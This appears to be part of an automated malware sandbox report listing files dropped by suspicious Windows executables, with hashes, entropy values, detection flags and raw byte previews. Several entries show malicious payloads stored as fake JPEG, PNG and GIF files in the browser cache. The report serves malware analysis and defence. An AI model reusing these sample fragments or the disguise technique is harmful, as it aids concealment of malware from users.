                                                                            Preview:.PNG........IHDR.............K`#.....PLTEGpL..qb....}dfkbefUo...V..N.pX<.#3j..F.Q..7......_.E.H.9....`=.yR.].Y.".9w......AJv.....h0DGO.?....+.Fp.4.[.'...0....61.$..d.].Q(.Mu.=8~.7\.d`..Y...Z.r.W..-.7.EY.?(..^...j..$.#.TX..\..Lo.:........k...J.!.....8.}....,.t.p....`........u..]^J.:......xY..w&>.:.....'..y6..Q....d...].%rk....n,.......W5.v...`T..C]..q.*z]a883...}%u5~0....&..o+X.:....d..*..!8t.2...Iv..{J+.!6..9w.B.}..C..c.........L.....0V.@..Q8.s.$.j..........."9...IlCL.F.<S>.i.q....:......J.v.....)....<.n.."...O...E.............x..+.DX.ix.EP.,|...Z.`.[.9h..>.<.......6.... ........<6.5&.]`.}....D..{7.....<4Qw.j%...2s....oo..AY......WP.$ ..3...mH.%..x...........].K..:D...J..^'.=.......jD..sL....... ...R#.......c...]{...i..>.W..US..Fw.....a1...M.z.....C$"q.kv...Kr.i6b........T.C..f{`..P..Q...(e..|.v...C...V..5..o..'.*..%..H6..!@y......iF...gO|....X........%D7;..'.-.~G......h&.|.9,/)..V`dk...z..~.w5....c_m..r..r...c.H..M.o.BG.jq&V....{.o...QK.

                                                                            C:\ProgramData\kfbe6yYK.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1589760
                                                                            Entropy (8bit):7.90258696497799
                                                                            Encrypted:false
                                                                            SSDEEP:49152:dpdlghXgOVb8xtjkAz9U0XYRd0zb78N9hQsLXv:BlghHBAZgH0UhPv
                                                                            MD5:ADFAC62AE0815EEFB205D73D9FEAC532
                                                                            SHA1:B2F7A7316F557902B7DC67FF5549422106EA9209
                                                                            SHA-256:3703D957230DC1A049DEBAD42C49514255CF81241C73EC3EB0C5BD473D4A2862
                                                                            SHA-512:86A9A99415FBA5F23B74FE320864A16976027B824FAB515D8D3FB3D444AD98FD20515BBDAA3B7909AAC08619A05913088BC1722B6B49AD4B92B5A719395F56A9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.:f.................$...................@....@...........................&...........@..................................u..x.............................&.....................................`v&.@............0..<............................text...x".......................... ..`.rdata...t...@......................@..@.data...._..........................@....1Q[......... ...................... ..`.),E.........0......................@....sc=.... 7...@...8.................. ..`.reloc........&......@..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\Public\Music\destopbak.ini

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:l:l
                                                                            MD5:739EDCC2C973B7A990767601FA661F21
                                                                            SHA1:6F8DF82DC929F3C40E2403252D9C7EC09001DBB6
                                                                            SHA-256:BA3C702B24E4EF16C111BF92823170F6E81FD37FBAFACCBEEF52192A1C094380
                                                                            SHA-512:098608F58AB3FC68088ACE47A30C15056D274AADA2893A224C29DDC0CC70F82B4CA723CE487DED1306F839AC12EE8782BC6383817FD77E7CDE3DEA99525731D1
                                                                            Malicious:false
                                                                            Preview:.@

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FOM-51[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):4859125
                                                                            Entropy (8bit):7.999956261017207
                                                                            Encrypted:true
                                                                            SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                            MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                            SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                            SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                            SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FOM-52[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5062442
                                                                            Entropy (8bit):7.999518892518095
                                                                            Encrypted:true
                                                                            SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                            MD5:70C21DA900796B279A09040B00953E40
                                                                            SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                            SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                            SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\b[1].gif

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):125333
                                                                            Entropy (8bit):7.993522712936246
                                                                            Encrypted:true
                                                                            SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                                            MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                                            SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                                            SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                                            SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\s[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):8299
                                                                            Entropy (8bit):7.9354275320361545
                                                                            Encrypted:false
                                                                            SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                                            MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                                            SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                                            SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                                            SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\FOM-50[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):55085
                                                                            Entropy (8bit):7.99273647746538
                                                                            Encrypted:true
                                                                            SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                            MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                            SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                            SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                            SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\FOM-51[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):4859125
                                                                            Entropy (8bit):7.999956261017207
                                                                            Encrypted:true
                                                                            SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                            MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                            SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                            SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                            SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\a[1].gif

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):135589
                                                                            Entropy (8bit):7.995304392539578
                                                                            Encrypted:true
                                                                            SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                                            MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                                            SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                                            SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                                            SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\drops[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):37274
                                                                            Entropy (8bit):7.991781062764932
                                                                            Encrypted:true
                                                                            SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                            MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                            SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                            SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                            SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\s[1].dat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):28272
                                                                            Entropy (8bit):7.711610294524518
                                                                            Encrypted:false
                                                                            SSDEEP:384:9segCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQw:35F1FUdy422IK+gAZt2i0YPpQn4GMP
                                                                            MD5:C8492B9F1CBC5D3B0DDE3A43F6A66DBD
                                                                            SHA1:3BB805E02A08F1E6C1F60A2FBB5B7F241D51A780
                                                                            SHA-256:95F833C067AC201A74F797125F33CCCF9696FBDF84E02D10C3A2D684A1D405D0
                                                                            SHA-512:E572C02ED76E8AFAC2C9C67E9D1E0A155B4DE5669478AE13A0D7F8106E818A53AF5385A459F246167B5138095279C2C41F123DF8A87F80917A633B29F896E837
                                                                            Malicious:false
                                                                            Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FOM-52[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5062442
                                                                            Entropy (8bit):7.999518892518095
                                                                            Encrypted:true
                                                                            SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                            MD5:70C21DA900796B279A09040B00953E40
                                                                            SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                            SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                            SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FOM-53[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):366410
                                                                            Entropy (8bit):7.375315637594966
                                                                            Encrypted:false
                                                                            SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                            MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                            SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                            SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                            SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\c[1].gif

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):10681
                                                                            Entropy (8bit):7.866148090449211
                                                                            Encrypted:false
                                                                            SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                                            MD5:10A818386411EE834D99AE6B7B68BE71
                                                                            SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                                            SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                                            SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\drops[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):37274
                                                                            Entropy (8bit):7.991781062764932
                                                                            Encrypted:true
                                                                            SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                            MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                            SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                            SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                            SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                            Malicious:true
